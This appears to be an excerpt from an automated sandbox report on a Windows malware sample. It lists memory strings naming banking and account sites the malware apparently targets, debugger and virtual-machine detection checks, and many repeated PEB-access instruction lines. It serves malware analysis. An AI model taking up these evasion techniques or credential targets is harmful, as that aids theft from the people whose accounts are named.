              Source: j77tfG6.14.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
              Source: j77tfG6.14.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: xQUrWfQeELsQZII.exe, 00000010.00000002.3704528727.000000000163F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
              Source: j77tfG6.14.dr Binary or memory string: tasks.office.comVMware20,11696492231o
              Source: j77tfG6.14.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: j77tfG6.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: j77tfG6.14.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: j77tfG6.14.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: j77tfG6.14.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: j77tfG6.14.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: j77tfG6.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: j77tfG6.14.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\chkntfs.exe Process queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Code function: 3_2_012E096E rdtsc
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Code function: 3_2_00417A13 LdrLoadDll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Code function: 3_2_012D0124 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B03E9 mov eax, dword ptr fs:[00000030h]3_2_012B03E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B03E9 mov eax, dword ptr fs:[00000030h]3_2_012B03E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B03E9 mov eax, dword ptr fs:[00000030h]3_2_012B03E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B03E9 mov eax, dword ptr fs:[00000030h]3_2_012B03E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B03E9 mov eax, dword ptr fs:[00000030h]3_2_012B03E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D63FF mov eax, dword ptr fs:[00000030h]3_2_012D63FF
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BE3F0 mov eax, dword ptr fs:[00000030h]3_2_012BE3F0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BE3F0 mov eax, dword ptr fs:[00000030h]3_2_012BE3F0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BE3F0 mov eax, dword ptr fs:[00000030h]3_2_012BE3F0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013443D4 mov eax, dword ptr fs:[00000030h]3_2_013443D4
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013443D4 mov eax, dword ptr fs:[00000030h]3_2_013443D4
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA3C0 mov eax, dword ptr fs:[00000030h]3_2_012AA3C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA3C0 mov eax, dword ptr fs:[00000030h]3_2_012AA3C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA3C0 mov eax, dword ptr fs:[00000030h]3_2_012AA3C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA3C0 mov eax, dword ptr fs:[00000030h]3_2_012AA3C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA3C0 mov eax, dword ptr fs:[00000030h]3_2_012AA3C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA3C0 mov eax, dword ptr fs:[00000030h]3_2_012AA3C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A83C0 mov eax, dword ptr fs:[00000030h]3_2_012A83C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A83C0 mov eax, dword ptr fs:[00000030h]3_2_012A83C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A83C0 mov eax, dword ptr fs:[00000030h]3_2_012A83C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A83C0 mov eax, dword ptr fs:[00000030h]3_2_012A83C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E3DB mov eax, dword ptr fs:[00000030h]3_2_0134E3DB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E3DB mov eax, dword ptr fs:[00000030h]3_2_0134E3DB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E3DB mov ecx, dword ptr fs:[00000030h]3_2_0134E3DB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E3DB mov eax, dword ptr fs:[00000030h]3_2_0134E3DB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013263C0 mov eax, dword ptr fs:[00000030h]3_2_013263C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135C3CD mov eax, dword ptr fs:[00000030h]3_2_0135C3CD
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129823B mov eax, dword ptr fs:[00000030h]3_2_0129823B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129826B mov eax, dword ptr fs:[00000030h]3_2_0129826B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A4260 mov eax, dword ptr fs:[00000030h]3_2_012A4260
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A4260 mov eax, dword ptr fs:[00000030h]3_2_012A4260
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A4260 mov eax, dword ptr fs:[00000030h]3_2_012A4260
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135A250 mov eax, dword ptr fs:[00000030h]3_2_0135A250
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135A250 mov eax, dword ptr fs:[00000030h]3_2_0135A250
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0137625D mov eax, dword ptr fs:[00000030h]3_2_0137625D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01328243 mov eax, dword ptr fs:[00000030h]3_2_01328243
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01328243 mov ecx, dword ptr fs:[00000030h]3_2_01328243
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A6259 mov eax, dword ptr fs:[00000030h]3_2_012A6259
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129A250 mov eax, dword ptr fs:[00000030h]3_2_0129A250
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B02A0 mov eax, dword ptr fs:[00000030h]3_2_012B02A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B02A0 mov eax, dword ptr fs:[00000030h]3_2_012B02A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013362A0 mov eax, dword ptr fs:[00000030h]3_2_013362A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013362A0 mov ecx, dword ptr fs:[00000030h]3_2_013362A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013362A0 mov eax, dword ptr fs:[00000030h]3_2_013362A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013362A0 mov eax, dword ptr fs:[00000030h]3_2_013362A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013362A0 mov eax, dword ptr fs:[00000030h]3_2_013362A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013362A0 mov eax, dword ptr fs:[00000030h]3_2_013362A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE284 mov eax, dword ptr fs:[00000030h]3_2_012DE284
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE284 mov eax, dword ptr fs:[00000030h]3_2_012DE284
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01320283 mov eax, dword ptr fs:[00000030h]3_2_01320283
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01320283 mov eax, dword ptr fs:[00000030h]3_2_01320283
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01320283 mov eax, dword ptr fs:[00000030h]3_2_01320283
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B02E1 mov eax, dword ptr fs:[00000030h]3_2_012B02E1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B02E1 mov eax, dword ptr fs:[00000030h]3_2_012B02E1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B02E1 mov eax, dword ptr fs:[00000030h]3_2_012B02E1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013762D6 mov eax, dword ptr fs:[00000030h]3_2_013762D6
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA2C3 mov eax, dword ptr fs:[00000030h]3_2_012AA2C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA2C3 mov eax, dword ptr fs:[00000030h]3_2_012AA2C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA2C3 mov eax, dword ptr fs:[00000030h]3_2_012AA2C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA2C3 mov eax, dword ptr fs:[00000030h]3_2_012AA2C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA2C3 mov eax, dword ptr fs:[00000030h]3_2_012AA2C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE53E mov eax, dword ptr fs:[00000030h]3_2_012CE53E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE53E mov eax, dword ptr fs:[00000030h]3_2_012CE53E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE53E mov eax, dword ptr fs:[00000030h]3_2_012CE53E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE53E mov eax, dword ptr fs:[00000030h]3_2_012CE53E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE53E mov eax, dword ptr fs:[00000030h]3_2_012CE53E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0535 mov eax, dword ptr fs:[00000030h]3_2_012B0535
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0535 mov eax, dword ptr fs:[00000030h]3_2_012B0535
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0535 mov eax, dword ptr fs:[00000030h]3_2_012B0535
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0535 mov eax, dword ptr fs:[00000030h]3_2_012B0535
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0535 mov eax, dword ptr fs:[00000030h]3_2_012B0535
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0535 mov eax, dword ptr fs:[00000030h]3_2_012B0535
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01336500 mov eax, dword ptr fs:[00000030h]3_2_01336500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D656A mov eax, dword ptr fs:[00000030h]3_2_012D656A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D656A mov eax, dword ptr fs:[00000030h]3_2_012D656A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D656A mov eax, dword ptr fs:[00000030h]3_2_012D656A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A8550 mov eax, dword ptr fs:[00000030h]3_2_012A8550
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A8550 mov eax, dword ptr fs:[00000030h]3_2_012A8550
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013205A7 mov eax, dword ptr fs:[00000030h]3_2_013205A7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013205A7 mov eax, dword ptr fs:[00000030h]3_2_013205A7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013205A7 mov eax, dword ptr fs:[00000030h]3_2_013205A7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C45B1 mov eax, dword ptr fs:[00000030h]3_2_012C45B1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C45B1 mov eax, dword ptr fs:[00000030h]3_2_012C45B1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D4588 mov eax, dword ptr fs:[00000030h]3_2_012D4588
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A2582 mov eax, dword ptr fs:[00000030h]3_2_012A2582
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A2582 mov ecx, dword ptr fs:[00000030h]3_2_012A2582
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE59C mov eax, dword ptr fs:[00000030h]3_2_012DE59C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DC5ED mov eax, dword ptr fs:[00000030h]3_2_012DC5ED
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DC5ED mov eax, dword ptr fs:[00000030h]3_2_012DC5ED
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A25E0 mov eax, dword ptr fs:[00000030h]3_2_012A25E0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE5CF mov eax, dword ptr fs:[00000030h]3_2_012DE5CF
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE5CF mov eax, dword ptr fs:[00000030h]3_2_012DE5CF
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A65D0 mov eax, dword ptr fs:[00000030h]3_2_012A65D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA5D0 mov eax, dword ptr fs:[00000030h]3_2_012DA5D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA5D0 mov eax, dword ptr fs:[00000030h]3_2_012DA5D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129E420 mov eax, dword ptr fs:[00000030h]3_2_0129E420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129E420 mov eax, dword ptr fs:[00000030h]3_2_0129E420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129E420 mov eax, dword ptr fs:[00000030h]3_2_0129E420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129C427 mov eax, dword ptr fs:[00000030h]3_2_0129C427
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA430 mov eax, dword ptr fs:[00000030h]3_2_012DA430
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D8402 mov eax, dword ptr fs:[00000030h]3_2_012D8402
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D8402 mov eax, dword ptr fs:[00000030h]3_2_012D8402
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D8402 mov eax, dword ptr fs:[00000030h]3_2_012D8402
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132C460 mov ecx, dword ptr fs:[00000030h]3_2_0132C460
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CA470 mov eax, dword ptr fs:[00000030h]3_2_012CA470
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CA470 mov eax, dword ptr fs:[00000030h]3_2_012CA470
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CA470 mov eax, dword ptr fs:[00000030h]3_2_012CA470
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135A456 mov eax, dword ptr fs:[00000030h]3_2_0135A456
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129645D mov eax, dword ptr fs:[00000030h]3_2_0129645D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C245A mov eax, dword ptr fs:[00000030h]3_2_012C245A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A64AB mov eax, dword ptr fs:[00000030h]3_2_012A64AB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132A4B0 mov eax, dword ptr fs:[00000030h]3_2_0132A4B0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D44B0 mov ecx, dword ptr fs:[00000030h]3_2_012D44B0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135A49A mov eax, dword ptr fs:[00000030h]3_2_0135A49A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A04E5 mov ecx, dword ptr fs:[00000030h]3_2_012A04E5
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131C730 mov eax, dword ptr fs:[00000030h]3_2_0131C730
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DC720 mov eax, dword ptr fs:[00000030h]3_2_012DC720
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DC720 mov eax, dword ptr fs:[00000030h]3_2_012DC720
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D273C mov eax, dword ptr fs:[00000030h]3_2_012D273C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D273C mov ecx, dword ptr fs:[00000030h]3_2_012D273C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D273C mov eax, dword ptr fs:[00000030h]3_2_012D273C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DC700 mov eax, dword ptr fs:[00000030h]3_2_012DC700
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A0710 mov eax, dword ptr fs:[00000030h]3_2_012A0710
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D0710 mov eax, dword ptr fs:[00000030h]3_2_012D0710
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A8770 mov eax, dword ptr fs:[00000030h]3_2_012A8770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D674D mov esi, dword ptr fs:[00000030h]3_2_012D674D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D674D mov eax, dword ptr fs:[00000030h]3_2_012D674D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D674D mov eax, dword ptr fs:[00000030h]3_2_012D674D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01324755 mov eax, dword ptr fs:[00000030h]3_2_01324755
